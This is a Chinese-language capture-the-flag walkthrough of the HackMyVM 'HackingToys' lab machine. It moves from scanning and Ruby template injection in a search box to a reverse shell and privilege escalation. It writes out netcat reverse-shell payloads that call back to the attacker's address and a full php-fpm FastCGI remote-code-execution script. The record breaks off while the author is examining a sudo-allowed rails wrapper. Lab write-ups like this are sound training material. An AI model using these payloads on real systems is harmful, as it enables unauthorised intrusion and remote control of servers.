HackingToys

说明：

这个靶机是打的第一个需要提前配置一下网络环境

网络配置

在打HackMyVM的靶场的时候首先就是要进行网络的配置，在HackMyVM里面的靶机里面有VMware的和VirtualBox的两种类型，在里面可以看到有两种类型的

Vitualbox http-only 配置

VMware 虚拟网络配置

kali设置

eth0和eth1设置

vim /etc/network/interfaces


auto eth0
iface eth0 inet dhcp
auto eth1
iface eth1 inet dhcp

重启网络

1	`service networking restart`

在靶机打开的情况下用arp-scan（若已经打开请重启靶机）

arp-scan -l                
Interface: eth0, type: EN10MB, MAC: 00:0c:29:13:58:9c, IPv4: 192.168.56.102
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:17       (Unknown: locally administered)
192.168.56.100  08:00:27:44:3b:b0       PCS Systemtechnik GmbH
192.168.56.101  08:00:27:b0:7d:40       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.372 seconds (107.93 hosts/sec). 3 responded

HackingToys

信息收集

先用nmap扫一下

nmap 192.168.56.101
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-24 01:09 CST
Nmap scan report for bogon (192.168.56.101)
Host is up (0.0017s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
3000/tcp open  ppp

Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds

发现开了22端口和3000端口，22端口是ssh服务端口，详细扫一下3000端口

nmap -sV 192.168.56.101 -p3000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-24 01:22 CST
Nmap scan report for bogon (192.168.56.101)
Host is up (0.00073s latency).

PORT     STATE SERVICE  VERSION
3000/tcp open  ssl/ppp?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.94SVN%T=SSL%I=7%D=9/24%Time=66F1A410%P=x86_64-pc-linux
SF:-gnu%r(GenericLines,3EF,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nContent-
SF:Length:\x20930\r\n\r\nPuma\x20caught\x20this\x20error:\x20Invalid\x20HT
SF:TP\x20format,\x20parsing\x20fails\.\x20Are\x20you\x20trying\x20to\x20op
SF:en\x20an\x20SSL\x20connection\x20to\x20a\x20non-SSL\x20Puma\?\x20\(Puma
SF:::HttpParserError\)\n/usr/local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\.2
SF:/lib/puma/client\.rb:268:in\x20`execute'\n/usr/local/rvm/gems/ruby-3\.1
SF:\.0/gems/puma-6\.4\.2/lib/puma/client\.rb:268:in\x20`try_to_finish'\n/u
SF:sr/local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\.2/lib/puma/server\.rb:29
SF:8:in\x20`reactor_wakeup'\n/usr/local/rvm/gems/ruby-3\.1\.0/gems/puma-6\
SF:.4\.2/lib/puma/server\.rb:248:in\x20`block\x20in\x20run'\n/usr/local/rv
SF:m/gems/ruby-3\.1\.0/gems/puma-6\.4\.2/lib/puma/reactor\.rb:119:in\x20`w
SF:akeup!'\n/usr/local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\.2/lib/puma/re
SF:actor\.rb:76:in\x20`block\x20in\x20select_loop'\n/usr/local/rvm/gems/ru
SF:by-3\.1\.0/gems/puma-6\.4\.2/lib/puma/reactor\.rb:76:in\x20`select'\n/u
SF:sr/local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\.2/lib/puma/reactor\.rb:7
SF:6:in\x20`select_loop'\n/usr/loc")%r(GetRequest,169E,"HTTP/1\.0\x20403\x
SF:20Forbidden\r\ncontent-type:\x20text/html;\x20charset=UTF-8\r\nContent-
SF:Length:\x205702\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en\">\n<head
SF:>\n\x20\x20<meta\x20charset=\"utf-8\"\x20/>\n\x20\x20<meta\x20name=\"vi
SF:ewport\"\x20content=\"width=device-width,\x20initial-scale=1\">\n\x20\x
SF:20<meta\x20name=\"turbo-visit-control\"\x20content=\"reload\">\n\x20\x2
SF:0<title>Action\x20Controller:\x20Exception\x20caught</title>\n\x20\x20<
SF:style>\n\x20\x20\x20\x20body\x20{\n\x20\x20\x20\x20\x20\x20background-c
SF:olor:\x20#FAFAFA;\n\x20\x20\x20\x20\x20\x20color:\x20#333;\n\x20\x20\x2
SF:0\x20\x20\x20color-scheme:\x20light\x20dark;\n\x20\x20\x20\x20\x20\x20s
SF:upported-color-schemes:\x20light\x20dark;\n\x20\x20\x20\x20\x20\x20marg
SF:in:\x200px;\n\x20\x20\x20\x20}\n\n\x20\x20\x20\x20body,\x20p,\x20ol,\x2
SF:0ul,\x20td\x20{\n\x20\x20\x20\x20\x20\x20font-family:\x20helvetica,\x20
SF:verdana,\x20arial,\x20sans-serif;\n\x20\x20\x20\x20\x20\x20font-size:\x
SF:20\x20\x2013px;\n\x20\x20\x20\x20\x20\x20line-height:\x2018px;\n\x20\x2
SF:0\x20\x20}\n\n\x20\x20\x20\x20pre\x20{\n\x20\x20\x20\x20\x20\x20font-si
SF:ze:\x2011px;\n\x20\x20\x20\x20\x20\x20white-space:\x20pre-wrap;\n\x20\x
SF:20\x20\x20}\n\n\x20\x20\x20\x20pre\.box\x20{\n\x20\x20\x20\x20\x20\x20b
SF:order:\x201px\x20solid\x20#EEE;\n\x20\x20\x20\x20\x20\x20padding:\x2010
SF:px;\n\x20\x20\x20\x20\x20\x20margin:\x200px;\n\x20\x20\x20\x20\x20\x20w
SF:idth:\x20958px;\n\x20\x20\x20\x20}\n\n\x20\x20\x20\x20header\x20{\n\x20
SF:\x20\x20\x20\x20\x20color:\x20#F0F0F0;\n\x20\x20\x20\x20\x20\x20backgro
SF:und:\x20#C00;\n\x20\x20\x20\x20\x20\x20padding:");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.50 seconds

发现有ssl试着用https访问一下

发现里面有5种黑客工具和一个搜索框

漏洞发现

点开五个链接发现都是这五个工具，只有搜索框可能能找到线索了，搜索一个不存在的东西试一下

输入内容有message的信息为Product does not exist很明显ssti有问题，把message后面的信息给修改一下，发现了xss漏洞，好像没太大用处。

发现网站语言是ruby

可以执行相关命令，尝试模板注入，发现可以执行

接着试一下能不能执行命令，分别执行“id”和“ls”命令发现返回一个“true”，似乎代表着成功，尝试一下反弹shell

1 2	`<%= system("id") %> <%= system("ls /") %>`

反弹shell

1	`<%= system('nc -e /bin/bash 192.168.56.102 4444') %>`

在kali上面监听4444端口

nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.101] 48188
id
uid=1000(lidia) gid=1000(lidia) groups=1000(lidia),100(users),1002(rvm)
whoami
lidia

用python开一个虚拟终端

1	`python3 -c "import pty;pty.spawn('/bin/bash')"`

发现可以查看passwd文件查看一下passwd文件，发现还有一个dodi用户

在两个机器之间互传一下公钥，实现免密登录

提权

查看进程发现在dodi用户上面运行这php-fpm服务

查看开放的端口

发现开放的9000端口，由于靶机里面没有socat用ssh吧9000端口映射到本地

1	`ssh -L 9000:127.0.0.1:9000 lidia@192.168.56.101`

有大佬在笔记里面说php-fpm能直接rce，https://exploit-notes.hdks.org/exploit/network/fastcgi-pentesting/

exp：

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> <port> >/tmp/f'); echo '-->';"
FILENAMES="/dev/shm/index.php" # Exisiting file path

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

    cat $OUTPUT
done

提权至dodi

修改一下脚本并执行

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('nc -e /bin/bash 192.168.56.102 5555'); echo '-->';"
FILENAMES="/var/www/html/index.php" # Exisiting file path

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

    cat $OUTPUT
done

监听端口

拿到shell时首先还是先传一下ssh公钥实现免密登录

提权至root

执行sudo -l发现有可执行的脚本

执行脚本

sudo /usr/local/bin/rvm_rails.sh
Usage:
  rails COMMAND [options]

You must specify a command:

  new          Create a new Rails application. "rails new my_app" creates a
               new application called MyApp in "./my_app"
  plugin new   Create a new Rails railtie or engine

All commands can be run with -h (or --help) for more information.

Inside a Rails application directory, some common commands are:

  console      Start the Rails console
  server       Start the Rails server
  test         Run tests except system tests

发现是用ruby语言写的网页程序开发框架rails

分析脚本

#!/bin/bash
export rvm_prefix=/usr/local
export MY_RUBY_HOME=/usr/local/rvm/rubies/ruby-3.1.0
export RUBY_VERSION=ruby-3.1.0
export rvm_version=1.29.12
export rvm_bin_path=/usr/local/rvm/bin
export GEM_PATH=/usr/local/rvm/gems/ruby-3.1.0:/usr/local/rvm/gems/ruby-3.1.0@global
export GEM_HOME=/usr/local/rvm/gems/ruby-3.1.0
export PATH=/usr/local/rvm/gems/ruby-3.1.0/bin:/usr/local/rvm/gems/ruby-3.1.0@global/bin:/usr/local/rvm/rubies/ruby-3.1.0/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/usr/local/rvm/bin
export IRBRC=/usr/local/rvm/rubies/ruby-3.1.0/.irbrc
export rvm_path=/usr/local/rvm
exec /usr/local/rvm/gems/ruby-3.1.0/bin/rails "$@"

脚本之后执行了 /usr/local/rvm/gems/ruby-3.1.0/bin/rails 这个文件